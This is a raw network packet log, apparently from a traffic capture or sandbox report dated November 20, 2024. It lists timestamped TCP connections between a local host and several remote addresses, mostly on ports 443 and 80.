                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.681967974 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.682009935 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.682039976 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.682060957 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.682070971 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.682112932 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.682120085 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.682471037 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.682499886 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.682508945 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.682521105 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.682559967 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.682596922 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.683192968 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.683234930 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.683259010 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.683262110 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.683274031 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.683309078 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.684031010 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.684092045 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.684098005 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.690515995 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.690584898 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.690593958 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.707861900 CET4434998413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.707892895 CET4434998413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.707940102 CET4434998413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.707952023 CET49984443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.707993031 CET49984443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.711956978 CET49984443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.711976051 CET4434998413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.711988926 CET49984443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.711994886 CET4434998413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.717077971 CET49999443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.717124939 CET4434999913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.717252970 CET49999443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.717283964 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.717724085 CET49999443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.717740059 CET4434999913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.722774029 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.728532076 CET4434998513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.728669882 CET4434998513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.728725910 CET49985443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.728856087 CET49985443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.728868961 CET4434998513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.728882074 CET49985443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.728887081 CET4434998513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.732526064 CET50000443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.732573032 CET4435000013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.732671022 CET50000443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.732865095 CET50000443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.732882023 CET4435000013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.767229080 CET4434998613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.767276049 CET4434998613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.767326117 CET4434998613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.767342091 CET49986443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.769750118 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.769807100 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.769813061 CET49986443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.769828081 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.769835949 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.769880056 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.769891024 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.769898891 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.769946098 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.769988060 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.770061016 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.770093918 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.770107031 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.770113945 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.770150900 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.770771027 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.770955086 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.770984888 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.771001101 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.771007061 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.771034002 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.771075964 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.771084070 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.771538973 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.771650076 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.771697998 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.771724939 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.771740913 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.771750927 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.771784067 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.771797895 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.771805048 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.771867990 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.772593975 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.772617102 CET4434998813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.772643089 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.772671938 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.772701025 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.772713900 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.772722960 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.772741079 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.772825003 CET4434998813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.772901058 CET49988443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.773478031 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.773505926 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.773534060 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.773540974 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.773581982 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.773602962 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.787858009 CET4434998913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.796751022 CET49986443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.796758890 CET4434998613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.796770096 CET49986443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.796773911 CET4434998613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.797143936 CET49988443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.797157049 CET4434998813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.797187090 CET49988443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.797192097 CET4434998813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.798131943 CET49989443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.798160076 CET4434998913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.798603058 CET49989443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.798608065 CET4434998913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.811362982 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.811399937 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.811423063 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.811433077 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.811475992 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.827918053 CET4434999013.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.828850031 CET4434999213.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.834014893 CET4434999413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.835920095 CET49990443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.835944891 CET4434999013.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.836086035 CET49992443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.836091995 CET4434999213.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.836236000 CET49994443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.836241961 CET4434999413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.836312056 CET4434999013.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.837182999 CET4434999213.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.837244034 CET49992443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.837728024 CET4434999413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.837804079 CET49994443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.838277102 CET49990443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.838346004 CET4434999013.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.839135885 CET49992443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.839204073 CET4434999213.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.839840889 CET49994443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.839952946 CET4434999413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.840590000 CET49990443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.840827942 CET49992443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.840833902 CET4434999213.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.840868950 CET49994443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.840876102 CET4434999413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.844065905 CET4434999313.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.844496965 CET49993443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.844525099 CET4434999313.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.845555067 CET4434999313.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.845635891 CET49993443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.845985889 CET49993443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.846049070 CET4434999313.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.846543074 CET49993443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.846550941 CET4434999313.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.854880095 CET50001443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.854909897 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.855092049 CET50001443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.857073069 CET50002443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.857119083 CET4435000213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.857188940 CET50002443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.857386112 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.857451916 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.857481956 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.857511997 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.857537031 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.857542992 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.857544899 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.857556105 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.857597113 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.857603073 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.857635021 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.857723951 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.857752085 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.857772112 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.857779026 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.857800961 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.857811928 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.857850075 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.857857943 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.857892990 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.857922077 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.857948065 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.857964039 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.857970953 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.858000994 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.858038902 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.858561993 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.858566999 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.859134912 CET50001443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.859147072 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.859349966 CET50002443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.859359980 CET4435000213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.859450102 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.859478951 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.859498978 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.859503984 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.859540939 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.859551907 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.859560013 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.859591961 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.859602928 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.859612942 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.859652042 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.859653950 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.859664917 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.859702110 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.859708071 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.859844923 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.859874964 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.859879017 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.859886885 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.859934092 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.859963894 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.859975100 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.859983921 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.859992981 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.860008955 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.860116005 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.860122919 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.860547066 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.860596895 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.860598087 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.860608101 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.860650063 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.860658884 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.860666990 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.860698938 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.860706091 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.861300945 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.861341000 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.861349106 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.861356020 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.861390114 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.861422062 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.861430883 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.861439943 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.861453056 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.861485004 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.861511946 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.861535072 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.861562967 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.861569881 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.861582041 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.861901045 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.861938953 CET44349987142.250.80.1192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.861990929 CET49987443192.168.2.6142.250.80.1
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.861995935 CET4434999113.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.862478971 CET49991443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.862495899 CET4434999113.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.863569975 CET4434999113.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.863718033 CET49991443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.864772081 CET49991443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.864993095 CET49991443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.865180969 CET4434999113.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.883333921 CET4434999013.107.246.40192.168.2.6
